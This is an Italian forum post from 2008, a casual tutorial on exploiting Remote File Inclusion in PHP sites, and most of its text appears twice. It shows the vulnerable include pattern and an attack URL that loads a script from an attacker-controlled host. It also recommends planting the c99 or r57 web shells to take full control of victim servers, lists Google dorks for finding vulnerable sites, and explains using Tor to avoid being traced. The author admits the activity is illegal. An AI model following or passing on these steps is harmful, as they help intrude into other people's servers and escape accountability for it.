- 30 Maggio 2008
- 736
- 0
- Miglior risposta
- 0
Buon pomeriggio ragazzi miei sono qui per spiegarvi la noble altre dell'rfi ovvero in inglese Remote File Inclusion per i 4 in inglese Inclusione Remota di File.
Il nome dice tutto questa tecnica permette di includere file di qualsiasi tipo all'interno di un server tutto questo da remoto.
Premetto che tutto questo è assolutamente illegale e io e sciax2 forum non ci prendiamo la responsabilità di quello che farete di questa guida tutto a solo scopo informativo.
Tornando a noi per quelli lenti a capire e che l'unica cosa che sanno fare a pc e giocare a spider lo dico più semplicemente:"Mettere qualsiasi cosa che c'è sul vostro pc dentro a un sito XD"
Allora Iniziamo con la teoria
Il remote file inclusion sfrutta le variabili non controllate nelle pagine web dinamiche
Esempio:index.php?pag=prova.php
$variabile1=$_GET[’pag‘];
include($variabile1);
cosa è sto coso?
E' un codice PHP
Questo "coso" assegna il valore prova.php alla variabile e tramite la funzione include
la include nella pagina
Sempre per gli spider boy
Sto coso assegna a variabile1 prova.php e tramite include lo mette nella pagina che vedi.
Come si sfrutta sto "coso"?
Ammetiamo che abbiamo uno script Php hostato su un sito e l'indirizzo dello script e per esempio
Attenzione lo script quando lo hostate salvatolo non in php ma in un altro formato va bene qualunque da .jpg a .gif passando per .dat ecc.....
Per includerlo nella pagna web basta fare cosi
index.php?pag=http://sitodelcaz.com/scriptdellam.txt
Et voilà avete incluso il vostro script
Si può includere qualsiasi script in php ma a noi interessa uppare delle shell
Per gli spider boy
Allora abbiamo un coso .php messo su un sito tipo altervista e per andare a sto coso si va su
per includerlo nel sito si fa cosi
esempio:index.php?pag=http://sitodelc.com/script.txt
Et voilà avete incluso il vostro scritp
Veniamo a noi
Le shell
Partiamo dal presupposto che non sono conchiglie le shell ovvero sigifica concoglia ma non mettiamo le conchiglie sui server XD
Le shell sono degli script con cui si puo uppare cancellare e fare ciò che caspito si vuole sul server dove è hostata
Le più famose sono la c99 e la r57 noi usiamo la c99 e migliore e a me piace di più ù_ù
Allora l'utilizzo delle shell e semplicissimo una grafica intuitivapossiamo esplorare tutto quello che c'è s server e includere file
Ecco uno screen
Come potete vedere la cosa è semplice è scritto in inglese ma e estremamente intuitivo
In alto vedete le informazioni del server poi le varie cartelle
E alla fine il blocco command execute li potere far eseguire comandi al server fare nuove directory cancellarle modifcare pagine insomma il server e in mani vostre.
Spider boy
Allora questa shell server per fare tutto quello che vuoi sul server esegui comandi cancelli le cose metti le cose dal tuo pc sul server insomma puoi fare quello che casputi ti pare
Andiamo avanti
Come trovare siti vulnerabili?
Eh!
Qui viene in aiuto niente poco di meno che zio google!!!
Con le sue fantasmagoriche dork
quella che ci interessa a noi
è
inurl:index.php?page=
allora cercate questo con google e troverete diversi risultati li applicate il metodo descritto spra se esce un errore cambiate sito se invece vediet apparire la shell be avete fatto.
Alcuni consigli su dork
._____________________________________________________.
| Bug | Dork |
|—————————————————–.
| index.php?x= | inurl:”index.php?x=*.php” |
| index.php?nic= | inurl:”index.php?nic=*.php” |
| homepage.php?sel= | inurl:”homepage.php?sel=*.php” |
| index.php?sel= | inurl:”index.php?sel=*.php” |
| main.php?x= | inurl:”main.php?x=*.php” |
| index2.php?x= | inurl:index2.php?x=*.php” |
| main.php?pagina= | inurl:”main.php?pagina=*.php” |
| test.php?page= | inurl:test.php?page= |
|___________________|_________________________________|
Ecco qui sbizzaretivi voi
Tutto questo mi sembra ovvio che bisogna farlo proxato se non volete finire in guai seri
Guida nella guida
Come proxarsi
Allora scaricate tor da qui
Installatelo fate partire privoxy e Vidalia bundle aspettate che la cipolla in tray icon diventi verde
Bene tor e pronto passiamo alla configurazione del broswer
Il mio consiglio e di usare firefox
Scaricate firefox se non lo avete scaricate l'estensione tor button esce inclusa nell'instalalzione
Installatele in firefox
e al riavvio trverete nella barra sotto di firefox una scritta rossa cliccatela diventerà verde
Bene siete proxati per verificare
Andate con due broswer uno mozilla proxato e uno non proxato su ilmioip.it
Verificate se sono due ip diffferenti se sono differenti seiet proxati al lavoro!
ATTENZIONE SE SUL SITO CI SONO CONTENUTI JAVA E FLASH PROXASRI NON SERVER PERCHE' QUEI COMPONENTI PRENDONO IL VOSTRO IP
PER EVITARE QUESTO SCARICATE L'ESTENSIONE PER FIREFOX NO SCRIPT E ATTIVATELA
Fonte MIA
Screen Google
Spero di esservi stato utile scusate per le parolacce ma cosi si capisce meglio spero meriti il rilievo
Alla prossima
Attenzione che per fare inclusione di file remoti bisogna che sia abilitato in Apache allow_url_open altrimenti non si possono fare inclusioni remote. Su AlterVista e la magigor parte degli hosting gratuiti è disattivato. Al posto di usare un include si potrebbero usare le librerie CURL o fsockopen.
Ma se volete farlo per bene fatelo sugli hosting a pagamento XD
Dimenticavo guida apporvata da chuck norris
Il nome dice tutto questa tecnica permette di includere file di qualsiasi tipo all'interno di un server tutto questo da remoto.
Premetto che tutto questo è assolutamente illegale e io e sciax2 forum non ci prendiamo la responsabilità di quello che farete di questa guida tutto a solo scopo informativo.
Tornando a noi per quelli lenti a capire e che l'unica cosa che sanno fare a pc e giocare a spider lo dico più semplicemente:"Mettere qualsiasi cosa che c'è sul vostro pc dentro a un sito XD"
Allora Iniziamo con la teoria
Il remote file inclusion sfrutta le variabili non controllate nelle pagine web dinamiche
Esempio:index.php?pag=prova.php
$variabile1=$_GET[’pag‘];
include($variabile1);
cosa è sto coso?
E' un codice PHP
Questo "coso" assegna il valore prova.php alla variabile e tramite la funzione include
la include nella pagina
Sempre per gli spider boy
Sto coso assegna a variabile1 prova.php e tramite include lo mette nella pagina che vedi.
Come si sfrutta sto "coso"?
Ammetiamo che abbiamo uno script Php hostato su un sito e l'indirizzo dello script e per esempio
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Attenzione lo script quando lo hostate salvatolo non in php ma in un altro formato va bene qualunque da .jpg a .gif passando per .dat ecc.....
Per includerlo nella pagna web basta fare cosi
index.php?pag=http://sitodelcaz.com/scriptdellam.txt
Et voilà avete incluso il vostro script
Si può includere qualsiasi script in php ma a noi interessa uppare delle shell
Per gli spider boy
Allora abbiamo un coso .php messo su un sito tipo altervista e per andare a sto coso si va su
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
perchè txt? perchè senno il coso va sul sito dove è hostato mentre a noi interessa che venga fatto andare su quello della vittima.per includerlo nel sito si fa cosi
esempio:index.php?pag=http://sitodelc.com/script.txt
Et voilà avete incluso il vostro scritp
Veniamo a noi
Le shell
Partiamo dal presupposto che non sono conchiglie le shell ovvero sigifica concoglia ma non mettiamo le conchiglie sui server XD
Le shell sono degli script con cui si puo uppare cancellare e fare ciò che caspito si vuole sul server dove è hostata
Le più famose sono la c99 e la r57 noi usiamo la c99 e migliore e a me piace di più ù_ù
Allora l'utilizzo delle shell e semplicissimo una grafica intuitivapossiamo esplorare tutto quello che c'è s server e includere file
Ecco uno screen
Come potete vedere la cosa è semplice è scritto in inglese ma e estremamente intuitivo
In alto vedete le informazioni del server poi le varie cartelle
E alla fine il blocco command execute li potere far eseguire comandi al server fare nuove directory cancellarle modifcare pagine insomma il server e in mani vostre.
Spider boy
Allora questa shell server per fare tutto quello che vuoi sul server esegui comandi cancelli le cose metti le cose dal tuo pc sul server insomma puoi fare quello che casputi ti pare
Andiamo avanti
Come trovare siti vulnerabili?
Eh!
Qui viene in aiuto niente poco di meno che zio google!!!
Con le sue fantasmagoriche dork
quella che ci interessa a noi
è
inurl:index.php?page=
allora cercate questo con google e troverete diversi risultati li applicate il metodo descritto spra se esce un errore cambiate sito se invece vediet apparire la shell be avete fatto.
Alcuni consigli su dork
._____________________________________________________.
| Bug | Dork |
|—————————————————–.
| index.php?x= | inurl:”index.php?x=*.php” |
| index.php?nic= | inurl:”index.php?nic=*.php” |
| homepage.php?sel= | inurl:”homepage.php?sel=*.php” |
| index.php?sel= | inurl:”index.php?sel=*.php” |
| main.php?x= | inurl:”main.php?x=*.php” |
| index2.php?x= | inurl:index2.php?x=*.php” |
| main.php?pagina= | inurl:”main.php?pagina=*.php” |
| test.php?page= | inurl:test.php?page= |
|___________________|_________________________________|
Ecco qui sbizzaretivi voi
Tutto questo mi sembra ovvio che bisogna farlo proxato se non volete finire in guai seri
Guida nella guida
Come proxarsi
Allora scaricate tor da qui
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Installatelo fate partire privoxy e Vidalia bundle aspettate che la cipolla in tray icon diventi verde
Bene tor e pronto passiamo alla configurazione del broswer
Il mio consiglio e di usare firefox
Scaricate firefox se non lo avete scaricate l'estensione tor button esce inclusa nell'instalalzione
Installatele in firefox
e al riavvio trverete nella barra sotto di firefox una scritta rossa cliccatela diventerà verde
Bene siete proxati per verificare
Andate con due broswer uno mozilla proxato e uno non proxato su ilmioip.it
Verificate se sono due ip diffferenti se sono differenti seiet proxati al lavoro!
ATTENZIONE SE SUL SITO CI SONO CONTENUTI JAVA E FLASH PROXASRI NON SERVER PERCHE' QUEI COMPONENTI PRENDONO IL VOSTRO IP
PER EVITARE QUESTO SCARICATE L'ESTENSIONE PER FIREFOX NO SCRIPT E ATTIVATELA
Fonte MIA
Screen Google
Spero di esservi stato utile scusate per le parolacce ma cosi si capisce meglio spero meriti il rilievo
Alla prossima
Attenzione che per fare inclusione di file remoti bisogna che sia abilitato in Apache allow_url_open altrimenti non si possono fare inclusioni remote. Su AlterVista e la magigor parte degli hosting gratuiti è disattivato. Al posto di usare un include si potrebbero usare le librerie CURL o fsockopen.
Ma se volete farlo per bene fatelo sugli hosting a pagamento XD
Dimenticavo guida apporvata da chuck norris
Ultima modifica:
